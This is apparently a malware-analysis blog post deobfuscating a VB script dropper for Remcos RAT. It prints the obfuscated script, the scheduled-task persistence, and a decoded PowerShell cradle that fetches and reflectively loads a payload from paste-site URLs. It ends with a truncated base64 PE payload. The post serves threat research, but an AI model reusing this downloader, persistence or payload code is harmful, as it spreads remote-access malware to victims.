2024-01-14 Remcos RAT Infection

Summary
=========

The last time I “published” anything was about a 1.8 years or so ago. So in the spirit of New Years resolutions to myself it really has come time for me to get back on the horse and get back into some sort of posting again. So let’s jump into an alert that I came across for what looks to be Remcos RAT.

Link to the artifacts from this investigation can be found over at my Github here which also includes the output from the two URLs seen in the VB script. The memory dump of the Remcos process can be found here instead.

Initial Analysis
=============

Based on initial investigation, the VB script was downloaded directly from hxxps://hidrive[.]ionos[.]com/lnk/SBBJoDne#file with no referrer or anything of the sort. Once the file is executed the following process tree can be seen.

Looking at what was inside this VB script file, initially there seems to be a lot of noise/garbage as one would expect.

'////////////////////////////////////////////////////////////////////////////////////////
'////////////////////////////////////////////////////////////////////////////////////////
'Reads the registry looking for a JoYB qxtjb and if found reports whether or not
'that qxtjb enables JoYB.
Function OoUrkN(qxtjb, UHnWO)

On Error Resume Next

Dim OWOhO, PeQGtlValue
PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)

If Err.Number = 0 Then
If PeQGtlValue = 1 Then
YryWTxZYO UHnWO & QLNYHYaBW
OWOhO = True
Else
YryWTxZYO UHnWO & DkIekRQq
OWOhO = False
End If

YryWTxZYO qxtjb
YryWTxZYO qNDMMM
Else
OWOhO = False
End If
Err.Clear

OoUrkN = OWOhO
End Function


'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next



OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then





Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function








'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then



Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function

'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then



Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function

'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then



Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function

'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then



Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function







On Error Resume Next
if 0 then
Set objShell = CreateObject("WScript.Shell")

zoologico = "MinhaTarefaVBScript"

eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f"
objShell.Run eCoeCoeCoeCo, 0, True

strScriptPath = WScript.ScriptFullName

strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")

Mirasoles = strTempFolder & "\SeuScript.vbs"

' Cria um objeto FileSystemObject
Set objFSO = CreateObject("Scripting.FileSystemObject")

On Error Resume Next
' Tenta copiar o arquivo para a pasta tempor?ria
objFSO.CopyFile strScriptPath, Mirasoles, True
If Err.Number <> 0 Then
MsgBox "Erro ao copiar o arquivo para a pasta tempor?ria: " & Err.Description
End If
On Error GoTo 0

strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1"
objShell.Run strCreateCommand, 0, True

end if
On Error Resume Next

'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then



Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
End If

xOdtc = OWOhO
End Function



On Error Resume Next

mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:
mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:
mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:

dim ARmxU 
ARmxU = WScript.ScriptFullName

HwxcO = ("J?%Bl?%G8?%a?%Bl?%HE?%I?%?%9?%C?%?%Jw?%w?%DM?%Jw?%7?%CQ?%cgBk?%GE?%dQBu?%C?%?%PQ?%g?%Cc?%JQBw?%Ho?%QQBj?%E8?%ZwBJ?%G4?%TQBy?%CU?%Jw?%7?%Fs?%QgB5?%HQ?%ZQBb?%F0?%XQ?%g?%CQ?%Z?%Bo?%Gc?%b?%Bs?%C?%?%PQ?%g?%Fs?%cwB5?%HM?%d?%Bl?%G0?%LgBD?%G8?%bgB2?%GU?%cgB0?%F0?%Og?%6?%EY?%cgBv?%G0?%QgBh?%HM?%ZQ?%2?%DQ?%UwB0?%HI?%aQBu?%Gc?%K?%?%g?%Cg?%TgBl?%Hc?%LQBP?%GI?%agBl?%GM?%d?%?%g?%E4?%ZQB0?%C4?%VwBl?%GI?%QwBs?%Gk?%ZQBu?%HQ?%KQ?%u?%EQ?%bwB3?%G4?%b?%Bv?%GE?%Z?%BT?%HQ?%cgBp?%G4?%Zw?%o?%C?%?%K?%BO?%GU?%dw?%t?%E8?%YgBq?%GU?%YwB0?%C?%?%TgBl?%HQ?%LgBX?%GU?%YgBD?%Gw?%aQBl?%G4?%d?%?%p?%C4?%R?%Bv?%Hc?%bgBs?%G8?%YQBk?%FM?%d?%By?%Gk?%bgBn?%Cg?%JwBo?%HQ?%d?%Bw?%HM?%Og?%v?%C8?%d?%Bl?%Hg?%d?%Bi?%Gk?%bg?%u?%G4?%ZQB0?%C8?%cgBh?%Hc?%LwBl?%Ho?%agBt?%G8?%ZgB6?%DM?%cw?%2?%Cc?%KQ?%g?%Ck?%I?%?%p?%Ds?%WwBz?%Hk?%cwB0?%GU?%bQ?%u?%EE?%c?%Bw?%EQ?%bwBt?%GE?%aQBu?%F0?%Og?%6?%EM?%dQBy?%HI?%ZQBu?%HQ?%R?%Bv?%G0?%YQBp?%G4?%LgBM?%G8?%YQBk?%Cg?%J?%Bk?%Gg?%ZwBs?%Gw?%KQ?%u?%Ec?%ZQB0?%FQ?%eQBw?%GU?%K?%?%n?%E0?%YQBy?%GE?%YwBh?%Gk?%YgBv?%C4?%QwBs?%GE?%cwBz?%DE?%Jw?%p?%C4?%RwBl?%HQ?%TQBl?%HQ?%a?%Bv?%GQ?%K?%?%n?%E0?%cwBx?%EI?%SQBi?%Fk?%Jw?%p?%C4?%SQBu?%HY?%bwBr?%GU?%K?%?%k?%G4?%dQBs?%Gw?%L?%?%g?%Fs?%bwBi?%Go?%ZQBj?%HQ?%WwBd?%F0?%I?%?%o?%Cc?%M?%?%v?%Es?%dwBC?%FI?%Vw?%v?%GQ?%LwBl?%GU?%LgBl?%HQ?%cwBh?%H?%?%Lw?%v?%Do?%cwBw?%HQ?%d?%Bo?%Cc?%I?%?%s?%C?%?%J?%By?%GQ?%YQB1?%G4?%I?%?%s?%C?%?%JwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%XwBf?%F8?%LQ?%t?%C0?%LQ?%t?%C0?%LQ?%n?%Cw?%I?%?%k?%GU?%bwBo?%GU?%cQ?%s?%C?%?%Jw?%x?%Cc?%L?%?%g?%Cc?%UgBv?%GQ?%YQ?%n?%C?%?%KQ?%p?%Ds?%")

dim waalb

waalb = ("$dgUdYL = '") & HwxcO & "'" 
waalb = waalb & ";$KByHL = [system.Text.Encoding]::Unicode.GetString( "

'////////////////////////////////////////////////////////////////////////////////////////
'////////////////////////////////////////////////////////////////////////////////////////
'Reads the registry looking for a JoYB qxtjb and if found reports whether or not
'that qxtjb enables JoYB.
Function OoUrkN(qxtjb, UHnWO)

On Error Resume Next

Dim OWOhO, PeQGtlValue
PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)

If Err.Number = 0 Then
If PeQGtlValue = 1 Then
YryWTxZYO UHnWO & QLNYHYaBW
OWOhO = True
Else
YryWTxZYO UHnWO & DkIekRQq
OWOhO = False
End If

YryWTxZYO qxtjb
YryWTxZYO qNDMMM
Else
OWOhO = False
End If
Err.Clear

OoUrkN = OWOhO
End Function



'////////////////////////////////////////////////////////////////////////////////////////
'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16
Function xOdtc(DgWuA)

On Error Resume Next





OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then

Once the script was cleaned up using CyberChef and the unique recipe, this is what was left.

'Reads the registry looking for a JoYB qxtjb and if found reports whether or not
'that qxtjb enables JoYB.

Function OoUrkN(qxtjb, UHnWO)
On Error Resume Next
Dim OWOhO, PeQGtlValue
PeQGtlValue = fnuNLWOcL.BHzmzDhXu(qxtjb)
If Err.Number = 0 Then
If PeQGtlValue = 1 Then
YryWTxZYO UHnWO & QLNYHYaBW
OWOhO = True
Else
YryWTxZYO UHnWO & DkIekRQq
OWOhO = False
End If
YryWTxZYO qxtjb
YryWTxZYO qNDMMM
Else
OWOhO = False
End If
Err.Clear
OoUrkN = OWOhO
End Function

'Checks the registry for a particular qxtjb that enables JoYB in one specific
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,
'JoYB PTNJlzJZf override, JoYB for O15 and JoYB for O16

Function xOdtc(DgWuA)

OWOhO = False
If (DfaDL = KcnsL) Then
OWOhO = OoUrkN(qxtjb, UHnWO)
ElseIf (DfaDL = yrHLz) Then


Dim amTLpM, USKNnw
For Each amTLpM In JYXNc
USKNnw = qxtjb & amTLpM & wpunit
OWOhO = OWOhO Or OoUrkN(USKNnw, UHnWO)
Next
xOdtc = OWOhO

On Error Resume Next
if 0 then

Set objShell = CreateObject("WScript.Shell")
zoologico = "MinhaTarefaVBScript"
eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f"
objShell.Run eCoeCoeCoeCo, 0, True
strScriptPath = WScript.ScriptFullName
strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")
Mirasoles = strTempFolder & "\SeuScript.vbs"
' Cria um objeto FileSystemObject
Set objFSO = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
' Tenta copiar o arquivo para a pasta tempor�ria
objFSO.CopyFile strScriptPath, Mirasoles, True
If Err.Number <> 0 Then
MsgBox "Erro ao copiar o arquivo para a pasta tempor�ria: " & Err.Description
End If
On Error GoTo 0
strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1"
objShell.Run strCreateCommand, 0, True
end if
mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:
dim ARmxU 
ARmxU = WScript.ScriptFullName
HwxcO = ("J�%Bl�%G8�%a�%Bl�%HE�%I�%�%9�%C�%�%Jw�%w�%DM�%Jw�%7�%CQ�%cgBk�%GE�%dQBu�%C�%�%PQ�%g�%Cc�%JQBw�%Ho�%QQBj�%E8�%ZwBJ�%G4�%TQBy�%CU�%Jw�%7�%Fs�%QgB5�%HQ�%ZQBb�%F0�%XQ�%g�%CQ�%Z�%Bo�%Gc�%b�%Bs�%C�%�%PQ�%g�%Fs�%cwB5�%HM�%d�%Bl�%G0�%LgBD�%G8�%bgB2�%GU�%cgB0�%F0�%Og�%6�%EY�%cgBv�%G0�%QgBh�%HM�%ZQ�%2�%DQ�%UwB0�%HI�%aQBu�%Gc�%K�%�%g�%Cg�%TgBl�%Hc�%LQBP�%GI�%agBl�%GM�%d�%�%g�%E4�%ZQB0�%C4�%VwBl�%GI�%QwBs�%Gk�%ZQBu�%HQ�%KQ�%u�%EQ�%bwB3�%G4�%b�%Bv�%GE�%Z�%BT�%HQ�%cgBp�%G4�%Zw�%o�%C�%�%K�%BO�%GU�%dw�%t�%E8�%YgBq�%GU�%YwB0�%C�%�%TgBl�%HQ�%LgBX�%GU�%YgBD�%Gw�%aQBl�%G4�%d�%�%p�%C4�%R�%Bv�%Hc�%bgBs�%G8�%YQBk�%FM�%d�%By�%Gk�%bgBn�%Cg�%JwBo�%HQ�%d�%Bw�%HM�%Og�%v�%C8�%d�%Bl�%Hg�%d�%Bi�%Gk�%bg�%u�%G4�%ZQB0�%C8�%cgBh�%Hc�%LwBl�%Ho�%agBt�%G8�%ZgB6�%DM�%cw�%2�%Cc�%KQ�%g�%Ck�%I�%�%p�%Ds�%WwBz�%Hk�%cwB0�%GU�%bQ�%u�%EE�%c�%Bw�%EQ�%bwBt�%GE�%aQBu�%F0�%Og�%6�%EM�%dQBy�%HI�%ZQBu�%HQ�%R�%Bv�%G0�%YQBp�%G4�%LgBM�%G8�%YQBk�%Cg�%J�%Bk�%Gg�%ZwBs�%Gw�%KQ�%u�%Ec�%ZQB0�%FQ�%eQBw�%GU�%K�%�%n�%E0�%YQBy�%GE�%YwBh�%Gk�%YgBv�%C4�%QwBs�%GE�%cwBz�%DE�%Jw�%p�%C4�%RwBl�%HQ�%TQBl�%HQ�%a�%Bv�%GQ�%K�%�%n�%E0�%cwBx�%EI�%SQBi�%Fk�%Jw�%p�%C4�%SQBu�%HY�%bwBr�%GU�%K�%�%k�%G4�%dQBs�%Gw�%L�%�%g�%Fs�%bwBi�%Go�%ZQBj�%HQ�%WwBd�%F0�%I�%�%o�%Cc�%M�%�%v�%Es�%dwBC�%FI�%Vw�%v�%GQ�%LwBl�%GU�%LgBl�%HQ�%cwBh�%H�%�%Lw�%v�%Do�%cwBw�%HQ�%d�%Bo�%Cc�%I�%�%s�%C�%�%J�%By�%GQ�%YQB1�%G4�%I�%�%s�%C�%�%JwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%LQ�%t�%C0�%LQ�%t�%C0�%LQ�%n�%Cw�%I�%�%k�%GU�%bwBo�%GU�%cQ�%s�%C�%�%Jw�%x�%Cc�%L�%�%g�%Cc�%UgBv�%GQ�%YQ�%n�%C�%�%KQ�%p�%Ds�%")

$eoheq = '03';
$rdaun = '%pzAcOgInMr%';
Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );
[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));

dim waalb
waalb = ("$dgUdYL = '") & HwxcO & "'" 
waalb = waalb & ";
$KByHL = [system.Text.Encoding]::Unicode.GetString( "

waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )"
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,

'////////////////////////////////////////////////////////////////////////////////////////
'////////////////////////////////////////////////////////////////////////////////////////
waalb = waalb & ";
$KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "');powershell -command $KByHL;" 

set sjddc = CreateObject("WScript.Shell")
sjddc.Run "powershell -command " & (waalb) , 0, false
End function
Set JYXNc = vkrLKQUSi("lsZsUULOa")
'////////////////////////////////////////////////////////////////////////////////////////
'////////////////////////////////////////////////////////////////////////////////////////

Quickly looking at the remains of the script and just checking the different variables here and there, it looks like the actual script is just the below part.

NOTE: I am not fluent in the way of coding/scripting, so I could be very off the mark here. If so, please let me know.

Set objShell = CreateObject("WScript.Shell")
zoologico = "MinhaTarefaVBScript"
eCoeCoeCoeCo = "schtasks /delete /tn " & zoologico & " /f"
objShell.Run eCoeCoeCoeCo, 0, True
strScriptPath = WScript.ScriptFullName
strTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")
Mirasoles = strTempFolder & "\SeuScript.vbs"
' Cria um objeto FileSystemObject
Set objFSO = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
' Tenta copiar o arquivo para a pasta tempor�ria
objFSO.CopyFile strScriptPath, Mirasoles, True
If Err.Number <> 0 Then
MsgBox "Erro ao copiar o arquivo para a pasta tempor�ria: " & Err.Description
End If
On Error GoTo 0
strCreateCommand = "schtasks /create /tn " & zoologico & " /tr """ & Mirasoles & """ /sc minute /mo 1"
objShell.Run strCreateCommand, 0, True
end if
mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:
dim ARmxU 

ARmxU = WScript.ScriptFullName
HwxcO = ("J�%Bl�%G8�%a�%Bl�%HE�%I�%�%9�%C�%�%Jw�%w�%DM�%Jw�%7�%CQ�%cgBk�%GE�%dQBu�%C�%�%PQ�%g�%Cc�%JQBw�%Ho�%QQBj�%E8�%ZwBJ�%G4�%TQBy�%CU�%Jw�%7�%Fs�%QgB5�%HQ�%ZQBb�%F0�%XQ�%g�%CQ�%Z�%Bo�%Gc�%b�%Bs�%C�%�%PQ�%g�%Fs�%cwB5�%HM�%d�%Bl�%G0�%LgBD�%G8�%bgB2�%GU�%cgB0�%F0�%Og�%6�%EY�%cgBv�%G0�%QgBh�%HM�%ZQ�%2�%DQ�%UwB0�%HI�%aQBu�%Gc�%K�%�%g�%Cg�%TgBl�%Hc�%LQBP�%GI�%agBl�%GM�%d�%�%g�%E4�%ZQB0�%C4�%VwBl�%GI�%QwBs�%Gk�%ZQBu�%HQ�%KQ�%u�%EQ�%bwB3�%G4�%b�%Bv�%GE�%Z�%BT�%HQ�%cgBp�%G4�%Zw�%o�%C�%�%K�%BO�%GU�%dw�%t�%E8�%YgBq�%GU�%YwB0�%C�%�%TgBl�%HQ�%LgBX�%GU�%YgBD�%Gw�%aQBl�%G4�%d�%�%p�%C4�%R�%Bv�%Hc�%bgBs�%G8�%YQBk�%FM�%d�%By�%Gk�%bgBn�%Cg�%JwBo�%HQ�%d�%Bw�%HM�%Og�%v�%C8�%d�%Bl�%Hg�%d�%Bi�%Gk�%bg�%u�%G4�%ZQB0�%C8�%cgBh�%Hc�%LwBl�%Ho�%agBt�%G8�%ZgB6�%DM�%cw�%2�%Cc�%KQ�%g�%Ck�%I�%�%p�%Ds�%WwBz�%Hk�%cwB0�%GU�%bQ�%u�%EE�%c�%Bw�%EQ�%bwBt�%GE�%aQBu�%F0�%Og�%6�%EM�%dQBy�%HI�%ZQBu�%HQ�%R�%Bv�%G0�%YQBp�%G4�%LgBM�%G8�%YQBk�%Cg�%J�%Bk�%Gg�%ZwBs�%Gw�%KQ�%u�%Ec�%ZQB0�%FQ�%eQBw�%GU�%K�%�%n�%E0�%YQBy�%GE�%YwBh�%Gk�%YgBv�%C4�%QwBs�%GE�%cwBz�%DE�%Jw�%p�%C4�%RwBl�%HQ�%TQBl�%HQ�%a�%Bv�%GQ�%K�%�%n�%E0�%cwBx�%EI�%SQBi�%Fk�%Jw�%p�%C4�%SQBu�%HY�%bwBr�%GU�%K�%�%k�%G4�%dQBs�%Gw�%L�%�%g�%Fs�%bwBi�%Go�%ZQBj�%HQ�%WwBd�%F0�%I�%�%o�%Cc�%M�%�%v�%Es�%dwBC�%FI�%Vw�%v�%GQ�%LwBl�%GU�%LgBl�%HQ�%cwBh�%H�%�%Lw�%v�%Do�%cwBw�%HQ�%d�%Bo�%Cc�%I�%�%s�%C�%�%J�%By�%GQ�%YQB1�%G4�%I�%�%s�%C�%�%JwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%XwBf�%F8�%LQ�%t�%C0�%LQ�%t�%C0�%LQ�%n�%Cw�%I�%�%k�%GU�%bwBo�%GU�%cQ�%s�%C�%�%Jw�%x�%Cc�%L�%�%g�%Cc�%UgBv�%GQ�%YQ�%n�%C�%�%KQ�%p�%Ds�%")

$eoheq = '03';
$rdaun = '%pzAcOgInMr%';
Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );
[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));

dim waalb
waalb = ("$dgUdYL = '") & HwxcO & "'" 
waalb = waalb & ";
$KByHL = [system.Text.Encoding]::Unicode.GetString( "

waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )"
'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,


waalb = waalb & ";
$KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "');powershell -command $KByHL;" 

set sjddc = CreateObject("WScript.Shell")
sjddc.Run "powershell -command " & (waalb) , 0, false
End function

So running through the script it seems that the initial section sets up:

• the creation of the object in memory
• the scheduled task within Windows
• using the %TEMP% environment variable to copy the VB script file into whatever the %TEMP% variable is on the system
  • so nice of the author to let the user know if there was an issue with copying the file to the %TEMP% directory via a pop-up – lulz

Further down there is a block of what appears to base64 encoded text with an additional character added in to it. The hint  that this is a base64 string is due to the below line which is also replacing the additional character of ‘�%’ with an ‘A’:

waalb = waalb & "[system.Convert]::FromBase64String( $dgUdYL.replace('�%','A') ) )"

The following is the base64 block decoded using CyberChef once again.

$eoheq = '03';
$rdaun = '%pzAcOgInMr%';
Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );
[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));

Ok cool. So if I am doing the deobfuscation correctly here, the bottom half of the script looks like this.

ARmxU = WScript.ScriptFullName
HwxcO = ("$eoheq = '03'; $rdaun = '%pzAcOgInMr%';  
Byte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );
[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/KwBRW/d/ee.etsap//:sptth' , %pzAcOgInMr% , '____________________________________________-------', 03, '1', 'Roda' ));")

$KByHL = $KByHL.replace('%pzAcOgInMr%', '" & ARmxU & "');
powershell -command $KByHL;"
set sjddc =  CreateObject("WScript.Shell")
sjddc.Run "powershell -command " & (waalb) , 0, false

 

So the first URL that is listed (hxxps://textbin[.]net/raw/ezjmofz3s6) is a redirect (see the urlscan here) and goes to hxxps://pasteio[.]com/download/xNVOEKuDyLXR. I could not get the TXT file from URLScan as seen here, so I ended up using Any.Run to get the file, and then later using pasteio.com to decode the URL to get the same identical file that I got from Any.Run. The file obtained from hxxps://pasteio[.]com/download/xNVOEKuDyLXR was the following:

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